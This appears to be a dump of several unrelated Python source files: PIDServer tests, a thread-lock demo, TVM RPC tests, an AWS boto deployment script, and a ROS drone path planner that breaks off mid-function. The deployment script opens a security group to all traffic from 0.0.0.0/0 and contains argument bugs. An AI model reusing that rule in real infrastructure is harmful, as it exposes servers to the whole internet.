# subprocess exits zero.
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False, 30)),
multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
),
]
for p in procs:
p.start()
error_code = pid_server.run_subprocess(["sleep", "2"])
assert error_code == 79
assert time.time() < deadline, "crashing worker did not trigger exit"
for p in procs:
p.terminate()
p.join()
def test_health_check_pre_connect(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
fail_time = time.time() + 0.2
def health_check() -> None:
assert time.time() < fail_time
# Only one worker to guarantee a failed healthcheck before all workers have connected.
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
]
for p in procs:
p.start()
with pytest.raises(AssertionError):
pid_server.run(health_check, poll_period=0.05)
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_health_check_post_connect(self) -> None:
with ipc.PIDServer(addr=0, num_clients=2) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
fail_time = time.time() + 0.2
def health_check() -> None:
assert time.time() < fail_time
procs = [
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
multiprocessing.Process(target=TestPIDServer._worker_proc, args=(port, False)),
]
for p in procs:
p.start()
with pytest.raises(AssertionError):
pid_server.run(health_check, poll_period=0.05)
for p in procs:
p.join()
assert len(pid_server.graceful_shutdowns) == 0
def test_single_worker_failure_is_caught(self) -> None:
# This is a regression test; there used to be a codepath where we would stop checking pid's
# after the last pidclient disconnected, even if it disconnected with a failure.
with ipc.PIDServer(addr=0, num_clients=1) as pid_server:
assert pid_server.listener
_, port = pid_server.listener.getsockname()
p = multiprocessing.Process(
target=TestPIDServer._worker_proc, args=(port, False, 0.5, 1, True)
)
p.start()
with pytest.raises(det.errors.WorkerError):
pid_server.run()
p.terminate()
p.join()
|
d2.py
|
from threading import Lock
a = 0
lock = Lock()
def add():
global a
# global lock
for i in range(1000000):
lock.acquire()
a += 1
lock.release()
def desc():
global a
# global lock
for i in range(1000000):
lock.acquire()
a -= 1
lock.release()
if __name__ == '__main__':
"""
Locks add overhead and hurt performance.
Locks can also cause deadlocks and resource contention.
"""
from threading import Thread
t1 = Thread(target=add, name='add')
t2 = Thread(target=desc, name='desc')
t1.start()
t2.start()
t1.join()
t2.join()
print(a)
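# An equivalent, more idiomatic sketch: Lock supports the context-manager protocol,
# so the acquire/release pairs above can be written as `with lock:` blocks.
#
#   def add():
#       global a
#       for i in range(1000000):
#           with lock:
#               a += 1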
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import os
import stat
import logging
import time
import multiprocessing
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
ctx = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), ctx=ctx)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), ctx=ctx)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.asnumpy() + 1, b.asnumpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.register_func("rpc.test.addone")
def addone(x):
return x + 1
@tvm.register_func("rpc.test.strcat")
def strcat(name, x):
return "%s:%d" % (name, x)
@tvm.register_func("rpc.test.except")
def remotethrow(name):
raise ValueError("%s" % name)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm.error.RPCError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.register_func("rpc.test.runtime_str_concat")
def strcat(x, y):
return x + y
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.register_func("rpc.test.remote_array_func")
def remote_array_func(y):
x = np.ones((3, 4))
np.testing.assert_equal(y.asnumpy(), x)
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server("localhost")
remote = rpc.connect(server.host, server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.context).startswith("remote")
np.testing.assert_equal(r_cpu.asnumpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
# testcase of large array creation
server = rpc.Server("localhost")
remote = rpc.connect(server.host, server.port)
ctx = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, ctx)
b = tvm.nd.array(b_np, ctx)
np.testing.assert_equal(a.asnumpy(), a_np)
np.testing.assert_equal(b.asnumpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server("localhost")
client = rpc.connect(server.host, server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server("localhost")
client = rpc.connect(
server.host,
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server("localhost")
remote = rpc.connect(server.host, server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server("localhost", key="x0")
server1 = rpc.Server("localhost", key="x1")
client = rpc.connect(
server0.host,
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", server1.host, server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
ctx = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
# start the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
ctx = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
ctx = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl", target_host="llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), ctx)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), ctx)
fhost(a, b)
np.testing.assert_equal(b.asnumpy(), a.asnumpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.register_func("rpc.test.remote_func")
def addone(x):
return lambda y: x + y
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
f1 = client.get_function("rpc.test.remote_func")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server("localhost", key="x0")
server1 = rpc.Server("localhost", key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
server0.host,
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", server1.host, server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], ctx=client.cpu(0))
assert nd.asnumpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
server0.host,
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.register_func("rpc.test.remote_return_nd")
def my_module(name):
# Use closure to check the ref counter correctness
nd = tvm.nd.array(np.zeros(10).astype("float32"))
if name == "get_arr":
return lambda: nd
elif name == "ref_count":
return lambda: tvm.testing.object_use_count(nd)
elif name == "get_elem":
return lambda idx: nd.asnumpy()[idx]
elif name == "get_arr_elem":
return lambda arr, idx: arr.asnumpy()[idx]
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server("localhost", key="x1")
client = rpc.connect(server.host, server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.register_func("rpc.test.remote_func2")
def addone(x):
return lambda y: x + y
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.remote_func2")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker("localhost", port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
"localhost",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=(tracker.host, tracker.port),
)
time.sleep(1)
client = rpc.connect_tracker(tracker.host, tracker.port)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
server.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker("localhost", port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
"localhost",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=(tracker.host, tracker.port),
)
client = rpc.connect_tracker(tracker.host, tracker.port)
proc1 = multiprocessing.Process(
target=_target, args=(tracker.host, tracker.port, device_key, 4)
)
proc2 = multiprocessing.Process(
target=_target, args=(tracker.host, tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
test_rpc_echo()
test_rpc_session_constructor_args()
test_rpc_return_ndarray()
test_rpc_return_func()
test_bigendian_rpc()
test_rpc_remote_module()
test_rpc_file_exchange()
test_rpc_array()
test_rpc_simple()
test_local_func()
test_rpc_tracker_register()
test_rpc_tracker_request()
test_rpc_large_array()
|
deploy.py
|
#!/usr/bin/python
import threading
from boto.ec2.autoscale import AutoScaleConnection, Tag
from boto.exception import EC2ResponseError, BotoServerError
import time
import os
from boto.ec2.connection import EC2Connection
from boto.ec2.elb import HealthCheck, ELBConnection
from boto.ec2.autoscale import LaunchConfiguration
from boto.ec2.autoscale import AutoScalingGroup
from boto.ec2.autoscale import ScalingPolicy
from boto.ec2.cloudwatch import MetricAlarm
from boto.ec2.cloudwatch import CloudWatchConnection
from sys import argv
def read_properties(filename):
properties = []
for line in open(filename):
properties.append(line.replace('\n', ''))
return tuple(properties)
class MSBManager:
def __init__(self, aws_access_key, aws_secret_key):
self.ec2_conn = EC2Connection(aws_access_key, aws_secret_key)
self.elb_conn = ELBConnection(aws_access_key, aws_secret_key)
self.auto_scale_conn = AutoScaleConnection(aws_access_key, aws_secret_key)
self.cloud_watch_conn = CloudWatchConnection(aws_access_key, aws_secret_key)
self.default_cooldown = 60
def get_security_group(self, name):
sgs = [g for g in self.ec2_conn.get_all_security_groups() if g.name == name]
return sgs[0] if sgs else None
def create_security_group(self, name, description):
sgs = [g for g in self.ec2_conn.get_all_security_groups() if g.name == name]
sg = sgs[0] if sgs else None
if not sgs:
sg = self.ec2_conn.create_security_group(name, description)
try:
sg.authorize(ip_protocol="-1", from_port=None, to_port=None, cidr_ip="0.0.0.0/0", dry_run=False)
except EC2ResponseError:
pass
return sg
def remove_security_group(self, name):
self.ec2_conn.delete_security_group(name=name)
def create_instance(self, image, instance_type, key_name, zone, security_groups, tags):
instance = None
reservations = self.ec2_conn.get_all_instances()
for reservation in reservations:
for i in reservation.instances:
if 'Name' in i.tags and i.tags['Name'] == tags['Name'] and i.state == 'running':
instance = i
break
if not instance:
reservation = self.ec2_conn.run_instances(image, instance_type=instance_type, key_name=key_name, placement=zone, security_groups=security_groups, monitoring_enabled=True)
instance = reservation.instances[0]
while not instance.update() == 'running':
time.sleep(5)
time.sleep(10)
self.ec2_conn.create_tags([instance.id], tags)
return instance
def request_spot_instance(self, bid, image, instance_type, key_name, zone, security_groups, tags):
req = self.ec2_conn.request_spot_instances(price=bid, instance_type=instance_type, image_id=image, placement=zone,key_name=key_name, security_groups=security_groups)
instance_id = None
while not instance_id:
job_sir_id = req[0].id
requests = self.ec2_conn.get_all_spot_instance_requests()
for sir in requests:
if sir.id == job_sir_id:
instance_id = sir.instance_id
break
print('Job {} not ready'.format(job_sir_id))
time.sleep(60)
self.ec2_conn.create_tags([instance_id], tags)
return self.ec2_conn.get_all_instances(instance_ids=[instance_id])[0]
def remove_instance(self, instance_id):
self.remove_instances([instance_id])
def remove_instances(self, instance_ids):
self.ec2_conn.terminate_instances(instance_ids)
def remove_instance_by_tag_name(self, name):
reservations = self.ec2_conn.get_all_instances()
data_centers_intance_ids = []
for reservation in reservations:
for instance in reservation.instances:
if 'Name' in instance.tags and instance.tags['Name'] == name and instance.state == 'running':
data_centers_intance_ids.append(instance.id)
if data_centers_intance_ids:
self.remove_instances(data_centers_intance_ids)
def create_elb(self, name, zone, project_tag_value, security_group_id, instance_ids=None):
lbs = [l for l in self.elb_conn.get_all_load_balancers() if l.name == name]
lb = lbs[0] if lbs else None
if not lb:
hc = HealthCheck(timeout=50, interval=60, healthy_threshold=2, unhealthy_threshold=8, target='HTTP:80/heartbeat')
ports = [(80, 80, 'http')]
zones = [zone]
lb = self.elb_conn.create_load_balancer(name, zones, ports)
self.elb_conn.apply_security_groups_to_lb(name, [security_group_id])
lb.configure_health_check(hc)
if instance_ids:
lb.register_instances(instance_ids)
params = {'LoadBalancerNames.member.1': lb.name,
'Tags.member.1.Key': '15619project',
'Tags.member.1.Value': project_tag_value}
lb.connection.get_status('AddTags', params, verb='POST')
return lb
def remove_elb(self, name):
self.elb_conn.delete_load_balancer(name)
def create_launch_configuration(self, name, image, key_name, security_groups, instance_type):
lcs = [l for l in self.auto_scale_conn.get_all_launch_configurations() if l.name == name]
lc = lcs[0] if lcs else None
if not lc:
lc = LaunchConfiguration(name=name, image_id=image, key_name=key_name,
security_groups=[security_groups], instance_type=instance_type)
self.auto_scale_conn.create_launch_configuration(lc)
return lc
def remove_launch_configuration(self, name):
self.auto_scale_conn.delete_launch_configuration(name)
def create_autoscaling_group(self, name, lb_name, zone, tags, instance_ids=None):
lc = self.create_launch_configuration()
as_groups = [a for a in self.auto_scale_conn.get_all_groups() if a.name == name]
as_group = as_groups[0] if as_groups else None
if not as_group:
as_group = AutoScalingGroup(group_name=name, load_balancers=[lb_name], availability_zones=[zone],
launch_config=lc, min_size=4, max_size=4, health_check_type='ELB', health_check_period=120, connection=self.auto_scale_conn,
default_cooldown=self.default_cooldown, desired_capacity=4,
tags=tags)
self.auto_scale_conn.create_auto_scaling_group(as_group)
if instance_ids:
self.auto_scale_conn.attach_instances(name, instance_ids)
scale_up_policy = ScalingPolicy(name='scale_up', adjustment_type='ChangeInCapacity', as_name=name, scaling_adjustment=1, cooldown=self.default_cooldown)
scale_down_policy = ScalingPolicy(name='scale_down', adjustment_type='ChangeInCapacity', as_name=name, scaling_adjustment=-1, cooldown=self.default_cooldown)
self.auto_scale_conn.create_scaling_policy(scale_up_policy)
self.auto_scale_conn.create_scaling_policy(scale_down_policy)
scale_up_policy = self.auto_scale_conn.get_all_policies(as_group=name, policy_names=['scale_up'])[0]
scale_down_policy = self.auto_scale_conn.get_all_policies(as_group=name, policy_names=['scale_down'])[0]
alarm_dimensions = {'AutoScalingGroupName': name}
scale_up_alarm = MetricAlarm(name='scale_up_on_cpu', namespace='AWS/EC2', metric='CPUUtilization',
statistic='Average', comparison='>', threshold=85, period=60, evaluation_periods=1,
alarm_actions=[scale_up_policy.policy_arn], dimensions=alarm_dimensions)
self.cloud_watch_conn.create_alarm(scale_up_alarm)
scale_down_alarm = MetricAlarm(name='scale_down_on_cpu', namespace='AWS/EC2', metric='CPUUtilization', statistic='Average',
comparison='<', threshold=60, period=60, evaluation_periods=1,
alarm_actions=[scale_down_policy.policy_arn], dimensions=alarm_dimensions)
self.cloud_watch_conn.create_alarm(scale_down_alarm)
return as_group
def update_autoscaling_group_max_size(self, as_group, max_size):
setattr(as_group, 'max_size', max_size)
as_group.update()
def update_autoscaling_group_min_size(self, as_group, min_size):
setattr(as_group, 'min_size', min_size)
as_group.update()
def remove_autoscaling_group(self, name):
self.auto_scale_conn.delete_auto_scaling_group(name)
def request_spot_instance(manager, bid, image, instance_type, key_name, zone, security_groups, tags, instances):
print('Requesting spot instance with {} bid, image {} and {}'.format(bid, image, instance_type))
instances.append(manager.request_spot_instance(bid, image, instance_type, key_name, zone, security_groups, tags))
print('Created spot instance with {} bid, image {} and {}'.format(bid, image, instance_type))
def deploy(remove=False):
aws_access_key = os.environ['CLOUD_BURST_ACCESS_KEY']
aws_secret_key = os.environ['CLOUD_BURST_SECRET_KEY']
manager = MSBManager(aws_access_key, aws_secret_key)
region = 'us-east-1'
zone = 'us-east-1c'
key_name = 'cloudburstkey'
ssh_http_sg_name = 'SSH/HTTP'
http_sg_name = 'HTTP'
phase = 'phase1'
frontend_image = 'ami-c791c1a2'
number_of_frontend_servers = 1
frontend_server_bid = 0.06
frontend_server_name = 'FrontendServer'
frontend_elb_name = 'FrontendELB'
frontend_servers = []
if remove:
manager.remove_instance_by_tag_name(frontend_server_name)
print('Frontend Servers removed')
manager.remove_elb(frontend_elb_name)
print('Frontend ELB removed')
else:
request_spot_instance_threads = []
for dummy in range(number_of_frontend_servers):
t = threading.Thread(target=request_spot_instance, args=(manager, frontend_server_bid, frontend_image, 'm3.large', key_name, zone, [ssh_http_sg_name], {'Name': frontend_server_name, '15619project': phase}, frontend_servers, ))
t.start()
request_spot_instance_threads.append(t)
for request_spot_instance_thread in request_spot_instance_threads:
request_spot_instance_thread.join()
ssh_http_sg = manager.get_security_group(http_sg_name)
manager.create_elb(frontend_elb_name, zone, phase, ssh_http_sg.id, [frontend_server.instances[0].id for frontend_server in frontend_servers])
print('ELB {} created'.format(frontend_elb_name))
if __name__ == "__main__":
if argv[1] == 'deploy':
deploy()
elif argv[1] == 'remove':
deploy(True)
else:
print('Invalid option')
print('Done')
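# Usage sketch (inferred from the argv handling above, not from any original docs):
#
#   CLOUD_BURST_ACCESS_KEY=... CLOUD_BURST_SECRET_KEY=... python deploy.py deploy
#   CLOUD_BURST_ACCESS_KEY=... CLOUD_BURST_SECRET_KEY=... python deploy.py remove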
|
path_planner.py
|
#!/usr/bin/env python
"""
Zhiang Chen
May 2020
path planner
"""
import rospy
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from std_msgs.msg import Int8
from nav_msgs.msg import Path
from visualization_msgs.msg import Marker, MarkerArray
import uav_motion.msg
import actionlib
import numpy as np
from tf.transformations import quaternion_from_euler
from tf.transformations import euler_from_quaternion
from std_srvs.srv import Empty
import copy
from threading import Thread
import target_mapping.msg
import tf
from sensor_msgs.msg import Image
from sensor_msgs.msg import PointCloud2
from rtabmap_ros.srv import ResetPose, ResetPoseRequest
from utils.open3d_ros_conversion import convertCloudFromRosToOpen3d, convertCloudFromOpen3dToRos
import open3d as o3d
import rospkg
import yaml
import os
import time
import matplotlib.pyplot as plt
import visualization_msgs
rp = rospkg.RosPack()
pkg_path = rp.get_path('target_mapping')
config_path = os.path.join(pkg_path, 'config', 'target_mapping.yaml')
yaml_file = open(config_path)
params = yaml.load(yaml_file, Loader=yaml.FullLoader)
class PathPlanner(object):
def __init__(self):
self.id_ = -1
self.current_pose_ = PoseStamped()
self.current_pose_.pose.orientation.w = 1
self.saved_pose_ = PoseStamped()
self.marker_ = Marker()
self.cylinder_marker_ = Marker()
self.got_cylinder_marker_ = False
self.goal_position_ = Point()
self.goal_yaw_ = 0
self.plan_mode_ = 0
self.alpha = params['alpha']
self.bcem_alpha = params['bcem_alpha']
self.half_vfov = params['half_vfov'] # half vertical fov for mapping
# self.alpha is the camera angle, which is supposed to be 60 degrees according to the camera mount angle.
# However, if we set it as 60 degrees, the lower-bound scanning ray will be too long
# For example, alpha = 60 degrees, half FoV = 20 degrees, distance to keep is 1.5 meters.
# Then the vertical distance from the lower-bound scanning ray is 1.5*tan(60+20), which is 8.5 meters.
# The vertical distance from the upper-bound scanning ray is 1.5*tan(60-20), which is 1.3 meters.
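# A quick numeric check of the example above (assumed values, for illustration only):
#
#   import math
#   d = 1.5                               # distance to keep from the target
#   d * math.tan(math.radians(60 + 20))   # lower-bound ray: ~8.5 m vertical offset
#   d * math.tan(math.radians(60 - 20))   # upper-bound ray: ~1.3 m vertical offset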
self.mapping = False
rp = rospkg.RosPack()
pkg_path = rp.get_path('target_mapping')
self.pcd_path = os.path.join(pkg_path, 'pcd')
self.pc_map_ = PointCloud2()
self.path = Path()
self.path.header.frame_id = 'map'
self.local_path_pub = rospy.Publisher("/local_path", Path, queue_size=1)
self.poses = []
self.cylinder_marker_pub_ = rospy.Publisher('/path_planner/cylinder_marker', Marker, queue_size=2)
rospy.wait_for_service('stop_sampling')
self.stop_srv_client_ = rospy.ServiceProxy('stop_sampling', Empty)
self.as_ = actionlib.SimpleActionServer("/path_planner/target_plan", target_mapping.msg.TargetPlanAction,
execute_cb=self.targetPlanCallback, auto_start=False)
self.as_.start()
current_pose_sub_ = rospy.Subscriber('/mavros/local_position/pose', PoseStamped, self.poseCallback,
queue_size=1)
self.client_ = actionlib.SimpleActionClient('waypoints', uav_motion.msg.waypointsAction)
self.client_.wait_for_server()
#self.plan_thread_ = Thread(target=self.targetPlan, args=())
#self.plan_thread_.daemon = True
#self.plan_thread_.start()
self.resumeMap_srv_client_ = rospy.ServiceProxy('/rtabmap/resume', Empty)
self.pauseMap_srv_client_ = rospy.ServiceProxy('/rtabmap/pause', Empty)
self.newMap_srv_client_ = rospy.ServiceProxy('/rtabmap/trigger_new_map', Empty)
self.deleteMap_srv_client_ = rospy.ServiceProxy('/rtabmap/reset', Empty)
self.setPose_srv_client_ = rospy.ServiceProxy('/rtabmap/reset_odom_to_pose', ResetPose)
rospy.wait_for_service('/rtabmap/resume')
rospy.wait_for_service('/rtabmap/pause')
rospy.wait_for_service('/rtabmap/trigger_new_map')
#self.newMap_srv_client_()
self.deleteMap_srv_client_()
self.pauseMap_srv_client_()
map_sub_ = rospy.Subscriber('/rtabmap/cloud_map', PointCloud2, self.pointcloudCallback, queue_size=1)
rospy.loginfo("Path planner has been initialized!")
def startSearch(self):
positions = np.asarray(((0, 0, 24), (-15, 10, 24), (1, 12, 24), (0, 0, 20))) # granite dell search path
#positions = self.lawnmower(pt1=(50, 35), pt2=(-50, -35), origin=(30, 38), spacing=10, vertical=True) # pt1=(-50, -35)
#positions = self.lawnmower(pt1=(0, 35), pt2=(-50, -35), origin=(30, 38), spacing=10, vertical=True) # pt1=(-50, -35)
#positions = self.add_height(positions, 17.) # for blender_terrain, [10, 17]
yaws = self.getHeads(positions)
assert positions.shape[0] == len(yaws)
for i in range(len(yaws)):
goal = uav_motion.msg.waypointsGoal()
goal_p = positions[i]
self.goal_position_.x = float(goal_p[0])
self.goal_position_.y = float(goal_p[1])
self.goal_position_.z = float(goal_p[2])
q = self.current_pose_.pose.orientation
yaw = euler_from_quaternion((q.x, q.y, q.z, q.w))[2]
self.goal_yaw_ = yaw
goal.positions.append(self.goal_position_)
goal.yaws.append(yaw)
self.client_.send_goal(goal)
            while not rospy.is_shutdown():
rospy.sleep(1.)
current_p = np.asarray((self.current_pose_.pose.position.x,
